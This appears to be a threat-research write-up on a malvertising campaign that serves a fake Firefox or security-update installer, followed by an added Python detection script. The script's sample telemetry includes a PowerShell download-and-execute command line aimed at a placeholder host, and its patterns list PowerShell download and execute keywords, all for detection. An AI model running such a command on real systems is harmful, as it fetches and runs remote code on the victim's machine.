Malware authors and distributors follow the ebb and flow of the threat landscape. One campaign Malwarebytes Labs has tracked for a number of years recently introduced a new scheme that may move it entirely away from drive-by downloads via exploit kits. Malwarebytes Labs researcher Fillip Mouliatis identified a malvertising campaign leading to a fake Firefox update. The template is strongly inspired by similar schemes, in particular the one distributed by the FakeUpdates (SocGholish) threat actors.
FakeUpdates, FakeAV and malvertising are three closely related categories of threats that rely on social engineering as one of their main tactics. The campaigns usually use hidden iframes or specially crafted text to redirect the victim to a malicious website. There the victim can download packages (typically executables) that, when run on the victim's device, claim to clean up malware or provide other fake services. Other versions of this threat have been seen using fake Microsoft updates and modified ad servers, which don't actually download anything but still perform malicious activity on the end device. In any case, malvertising campaigns tend to push only one type of product, and malware authors consolidate their efforts by switching between campaigns.
Some of the fake updates mislead with a "Download and free your PC" message in text that looks like a screenshot of the installer. The file name is something similar to "Security Update 2014-02-05_14.20.257_0x78e6acff82b06e6880d38ea0c1f9a7a27f09d2e1.exe", which could confuse users by leading them to believe that the update is really designed for their operating system and applies to every computer on their network.
The file is actually an EXE that, when run, goes through a few checks to determine which version of the application is decrypted in memory. If the application is not available in the current registry on the system, it decrypts and executes another copy of itself from a remote location via PowerShell. The executable checks for several components and, if they are missing, downloads and tries to install them. It then opens a browser window containing an ad, directing users to continue their browsing by clicking on it.
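The two observable traits above, the fake "Security Update ..._0x<hex>.exe" file name and an installer that launches PowerShell to fetch and run remote content, are what an endpoint detection rule can key on. The following is an added example written for this page, not Malwarebytes code and not taken from the campaign itself. It assumes process-creation telemetry with parent image, child image and command line (Sysmon event 1 style); the sample events, the `placeholder.invalid` URL and the field names are constructed for the example. The file name in the sample is the one quoted in the text.

```python
"""Flag process-creation events that match the fake-update behaviour described above."""
import re
from typing import Iterable

# Shape of the fake "security update" installer name: a date, a version-like
# token and a long hex suffix prefixed with 0x (matches the name quoted in the text).
FAKE_UPDATE_NAME = re.compile(
    r"security update \d{4}-\d{2}-\d{2}_[\d.]+_0x[0-9a-f]{16,}\.exe$", re.IGNORECASE)

# Directories a user-launched, just-downloaded installer usually runs from.
USER_WRITABLE = re.compile(r"\\(downloads|temp|tmp|appdata)\\", re.IGNORECASE)

# PowerShell command-line fragments that fetch or execute remote content.
PS_DOWNLOAD = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-expression|\biex\b|-enc(odedcommand)?\b",
    re.IGNORECASE)


def is_powershell(image: str) -> bool:
    """True if the child image is a PowerShell host."""
    return image.lower().rsplit("\\", 1)[-1] in ("powershell.exe", "pwsh.exe")


def classify(event: dict) -> list[str]:
    """Return the reasons this event is suspicious (empty list if nothing matched)."""
    reasons = []
    image = event["image"]
    parent = event.get("parent", "")
    cmdline = event.get("cmdline", "")
    # Trait 1: the installer file name itself.
    if FAKE_UPDATE_NAME.search(image):
        reasons.append("fake-update installer filename")
    # Trait 2: an EXE in a user-writable directory spawning PowerShell that
    # downloads or evaluates remote content (the "copy of itself via PowerShell" step).
    if (is_powershell(image) and PS_DOWNLOAD.search(cmdline)
            and parent.lower().endswith(".exe") and USER_WRITABLE.search(parent)):
        reasons.append("user-writable exe spawned PowerShell with download/execute")
    return reasons


def analyze(events: Iterable[dict]) -> list[tuple[int, list[str]]]:
    """Run classify() over a stream of events; return (index, reasons) for hits only."""
    hits = []
    for i, ev in enumerate(events):
        reasons = classify(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed sample telemetry (hypothetical host "alice"; not real captured data).
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\alice\Downloads\Security Update 2014-02-05_14.20.257_0x78e6acff82b06e6880d38ea0c1f9a7a27f09d2e1.exe",
     "cmdline": ""},
    {"parent": r"C:\Users\alice\Downloads\Security Update 2014-02-05_14.20.257_0x78e6acff82b06e6880d38ea0c1f9a7a27f09d2e1.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/a')\""},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
    {"parent": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "image": r"C:\Program Files\Mozilla Firefox\updater.exe",
     "cmdline": "updater.exe"},
]

if __name__ == "__main__":
    for idx, reasons in analyze(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["image"], "->", "; ".join(reasons))
```

The two rules are deliberately independent: the file-name pattern is cheap but brittle (the actor can rename the file), while the parent/child rule survives renaming because it keys on behaviour. A benign PowerShell session started from explorer.exe (event 2) and Firefox's own updater (event 3) fall through both rules.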
The same campaign has also been spreading via malvertising since mid-December 2015, when it started hijacking visitors of popular websites like CNN and Fox News, promoting security-related topics.